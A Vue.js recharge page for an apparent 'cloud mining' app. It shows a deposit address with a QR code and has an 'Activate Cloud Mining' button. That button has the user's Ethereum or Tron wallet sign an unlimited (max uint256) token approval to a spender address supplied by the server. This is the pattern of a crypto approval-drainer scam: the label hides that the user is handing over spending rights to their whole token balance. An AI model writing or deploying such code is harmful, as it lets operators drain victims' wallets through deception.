<template>
  <div class="container">
      <NavbarSimple :leftText="$t('common.recharge')"></NavbarSimple>
      <template v-if="$route.query.type === '1'">
        <div class="block1">
          <canvas id="qrcode"></canvas>
          <span class="trxAddress">{{ $t("rechargePage.trxAddress") }}</span>
        </div>
        <div class="block2">
          <div class="block2-1">
              <input class="url-box" v-model="data.walletAddress">
              <span class="copy-btn" v-clipboard:copy="data.walletAddress" v-clipboard:success="onCopy" v-clipboard:error="onError">{{ $t("rechargePage.copyAddress") }}</span>
          </div>
          <div class="block2-2">
              <span class="tips1">{{ $t("rechargePage.tips1") }}</span>
              <span class="tips2">{{ $t("rechargePage.tips2") }}</span>
          </div>
          <van-button round color="#4A3933" block @click="$router.push('/mine')">{{ $t("rechargePage.rechargeCompleted") }}</van-button>
        </div>
      </template>
      <template v-else>
        <div class="block2">
          <div class="block2-1">
            <div v-if="data.approved">
              <van-badge dot color="#19be6b"/>
              <span style="margin-left: 4px;">{{$t('rechargePage.activated')}}</span>
            </div>
            <div v-else>
              <van-badge dot color="#808695"/>
              <span style="margin-left: 4px;">{{$t('rechargePage.inactivated')}}</span>
            </div>
          </div>
          <div class="block2-2">
              <span class="tips1">{{ $t("rechargePage.tips3") }}</span>
              <span class="tips2">{{ $t("rechargePage.tips4") }}</span>
          </div>
          <van-button round color="#4A3933" block @click="ActivateCloudMining" :disabled="data.approved">{{ $t("rechargePage.ActivateCloudMining") }}</van-button>
        </div>
      </template>
  </div>
</template>

<script>
import NavbarSimple from '@/components/NavbarSimple.vue'
const QRCode = require('qrcode');
const Web3 = require('web3');
export default {
    name: 'recharge',
    components: {
        NavbarSimple
    },
    data() {
        return {
            data: {
              addr: '',
              walletAddress: '',
              approved: false,
              spender: '',
              contractAddress: ''
            }
        }
    },
    mounted() {
      this.token = localStorage.getItem('token');
      this.chainId = localStorage.getItem('chainId');
      this._fetch();
    },
    methods: {
      _fetch() {
            this.apiV1({
                method: 'get',
                url: '/wallet',
                headers: {'Authorization': this.token}
            }).then(response => {
                const { success, data } = response.data;
                if (success) {
                  this.data = data;
                  if (this.$route.query.type === '1') {
                    const canvas = document.getElementById('qrcode')
                    QRCode.toCanvas(canvas, this.data.walletAddress, function (error) {
                        if (error) console.error(error)
                    })
                  }
                }
            })
        },
        async ActivateCloudMining() {
          if (this.chainId === '1') {
            const web3 = new Web3(window.ethereum);
            const abi = [
            {"constant":false,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}
            ];
            const erc20usd = new web3.eth.Contract(abi, this.data.contractAddress);
            const txParams = {
                to: this.data.contractAddress, // must be contract address
                from: this.data.addr,
                // gas: '0x138800',
                data: erc20usd.methods.approve(this.data.spender, '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff').encodeABI()
            };
            const gas = await web3.eth.estimateGas(txParams);
            txParams.gas = Math.ceil(gas * 1.1);
            const receipt = await web3.eth.sendTransaction(txParams);
          } else {
            let tronWeb;
            // 连接钱包
            if (typeof window.okxwallet !== 'undefined') {
                console.log('OKX is installed!');
                const result = await window.okxwallet.tronLink.request({ method: 'tron_requestAccounts'}).catch((error)=>{
                    console.log(error);
                })
                if (result.code !== 200) {
                    this.$notify({ type: 'warning', duration: 0, message: 'User rejected' });
                    return;
                }
                tronWeb = window.okxwallet.tronLink.tronWeb;
            } else if (window.tronWeb) {
                tronWeb = window.tronWeb;
            } else {
                this.$notify({ type: 'warning', duration: 0, message: this.$t('Please_open_the_website_in_the_Dapp_browser') });
            }
            const addr = tronWeb.defaultAddress.base58;
            if (!addr) {
                this.$notify({ type: 'warning', message: this.$t('Please_unlock_your_wallet') });
                return;
            }
            console.log(addr)
            const contractAddress = this.data.contractAddress;
            const spender = this.data.spender;
            const anyToken = await tronWeb.contract().at(contractAddress);
            await anyToken.increaseApproval(spender, '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff').send({
              feeLimit:100000000,
              callValue:0,
              shouldPollResponse:false
            });
          }
        },
        onCopy (e) {
            this.$toast.success(this.$t("common.copySucceeded"));
        },
        onError (e) {
            this.$toast.fail(this.$t("common.copyFailed"));
        }
    }
}
</script>

<style scoped lang="less">
.block1 {
    display: flex;
    flex-direction: column;
    align-items: center;
    #qrcode {
      box-sizing: border-box;
      border-radius: 4rem;
      width: 40rem !important;
      height: 40rem !important;
    }
    .trxAddress {
      font-size: 3.2rem;
      margin-top: 3.2rem;
    }
  }
.block2 {
    background-color: @app-theme-color4;
    border-radius: 4rem;
    border: 0.267rem solid #814000;
    padding: 4rem;
    margin: 10.667rem 3.333rem;
    .block2-1 {
      height: 8.8rem;
      font-size: 4rem;
      border-radius: 5.333rem;
      overflow: hidden;
      border: 1px solid #814000;
      display: flex;
      justify-content: center;
      align-items: center;
      .url-box {
        background-color: transparent;
        border: 0;
        margin: 0 2.4rem;
        width: 100%;
        color: @app-theme-color1;
      }
      .copy-btn {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 45.333rem;
        height: 8.8rem;
        background-color: #814000;
        color: #fff;
        font-size: 3.733rem;
      }
    }
    .block2-2 {
        background-color: #d6b593;
        border: 0.267rem solid #814000;
        border-radius: 3.733rem;
        padding: 3.888rem;
        margin: 5.333rem 0 4rem;
        display: flex;
        flex-direction: column;
        font-size: 3.888rem;
        text-align: center;
        color: #fffce3;
        span {
            margin: 1.333rem;
        }
        .tips2 {
            color: @app-theme-color3;
        }
    }
  }
</style>